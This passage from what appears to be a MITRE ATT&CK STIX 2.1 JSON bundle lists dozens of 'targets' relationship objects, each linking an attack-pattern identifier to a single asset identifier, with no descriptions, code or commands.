"object_marking_refs": [], "modified": "2024-07-01T10:37:15.822098", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8112d1bf-0969-4ed2-bad5-88256038d4d9", "created": "2024-07-01T10:37:15.822106", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--69e259c3-8b46-4f48-8ff5-3b9b9688e2fe", "created": "2024-07-01T10:37:15.822116", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822118", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dd3a427-4551-42e6-92c9-16cf006d1d27", "created": "2024-07-01T10:37:15.822125", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822128", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a9467470-c6ed-4ad0-b6d6-36eb95e04987", "created": "2024-07-01T10:37:15.822135", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822138", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d96a109b-c55f-420c-9b20-8ee84cfeba66", "created": "2024-07-01T10:37:15.822146", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822148", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6bc4bc1c-4952-429f-8439-e76b8af1cf74", "created": "2024-07-01T10:37:15.822199", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822202", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c728373f-3319-4fec-ac87-c7380ff8cdeb", "created": "2024-07-01T10:37:15.822211", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822213", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0fd49ee5-dcf0-4f36-b561-1bc11bab2b6c", "created": "2024-07-01T10:37:15.822222", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822224", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ca3e3e9-2332-4f94-912a-44f3bcb79e14", "created": "2024-07-01T10:37:15.822231", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822234", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a1bd846-ea3b-4def-bed8-48cea0e22219", "created": "2024-07-01T10:37:15.822241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822243", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3341c3bb-515c-493e-aecf-25c6b947f3e6", "created": "2024-07-01T10:37:15.822251", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822254", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--05f05b68-745c-4c00-addd-15f9a15144f8", "created": "2024-07-01T10:37:15.822262", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822264", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--48542643-9371-4772-9e4f-8d5976aa9ec2", "created": "2024-07-01T10:37:15.822272", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822274", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e91e8d52-f0cc-4e64-b147-2a92290645d2", "created": "2024-07-01T10:37:15.822282", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822284", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a6d9d83-df6e-4610-b7a3-3946d2e094c8", "created": "2024-07-01T10:37:15.822292", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822294", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3cef9f0b-4115-4ad1-b4fe-eb308d42563f", "created": "2024-07-01T10:37:15.822302", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822304", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02a105ec-355a-48b8-b51c-b7874ee0f5ed", "created": "2024-07-01T10:37:15.822312", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822314", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--024666a7-e1a5-4f0d-b020-332eea0b529d", "created": "2024-07-01T10:37:15.822323", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822325", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c5d39dde-c6af-4dcf-9dad-c9578eed965c", "created": "2024-07-01T10:37:15.822332", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822335", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--25b33e27-ac97-4e3b-b028-f20c42879bbe", "created": "2024-07-01T10:37:15.822342", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822345", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77f38a6f-ec62-4be9-8491-3d139810be78", "created": "2024-07-01T10:37:15.822352", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4323a7ea-6042-4821-806e-20c9100b7b06", "created": "2024-07-01T10:37:15.822362", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822364", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8139e7e-345a-4a60-8705-f724f6b4769e", "created": "2024-07-01T10:37:15.822372", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822375", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8e9b475-95d8-4d5a-ac51-e193396f0145", "created": "2024-07-01T10:37:15.822383", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822385", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--afd1af19-b38b-42bf-88f5-eee25a3d88c1", "created": "2024-07-01T10:37:15.822393", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822395", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--010a694d-43b4-4c17-8ef1-38b381b60b9a", "created": "2024-07-01T10:37:15.822403", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822405", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59e391fb-8e8d-46ef-87ba-831550e404cc", "created": "2024-07-01T10:37:15.822413", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822415", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3aa9a816-dae6-4fba-bfa6-566fa2495169", "created": "2024-07-01T10:37:15.822423", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822426", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f5ade01-0f1f-4107-b486-f238cae4dfb9", "created": "2024-07-01T10:37:15.822433", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822436", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53b2edb8-dc35-47c9-a55d-711d458f181d", "created": "2024-07-01T10:37:15.822443", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822446", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e7d4dca-920a-4d93-9bcf-77a8962681ba", "created": "2024-07-01T10:37:15.822454", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822456", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5bc6f708-0faf-4123-b710-85eb1cede45a", "created": "2024-07-01T10:37:15.822464", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822466", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a92e34c-4034-482a-b78f-e81437fbd8c7", "created": "2024-07-01T10:37:15.822474", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822476", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d6c4e7c8-4421-459a-b5a5-e10af747bd44", "created": "2024-07-01T10:37:15.822484", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822486", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--567bc3d8-1b6e-4334-bf89-de92fda59da0", "created": "2024-07-01T10:37:15.822494", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822496", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a53c814-7b0f-4868-9eae-c0721a5eddc0", "created": "2024-07-01T10:37:15.822504", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822506", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--af55ee6f-1308-4d00-a099-3baadb91dfcf", "created": "2024-07-01T10:37:15.822514", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822516", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc42ad87-69c6-4e62-8199-b7f40492028e", "created": "2024-07-01T10:37:15.822524", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822526", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bdffe611-c139-4534-ab3e-87356cbb213c", "created": "2024-07-01T10:37:15.822534", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822536", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6a511edb-d70f-4ef0-9927-7bb43818d344", "created": "2024-07-01T10:37:15.822544", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822546", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c10a9dc-8293-4ff1-98ed-b458718e0219", "created": "2024-07-01T10:37:15.822554", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822556", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": 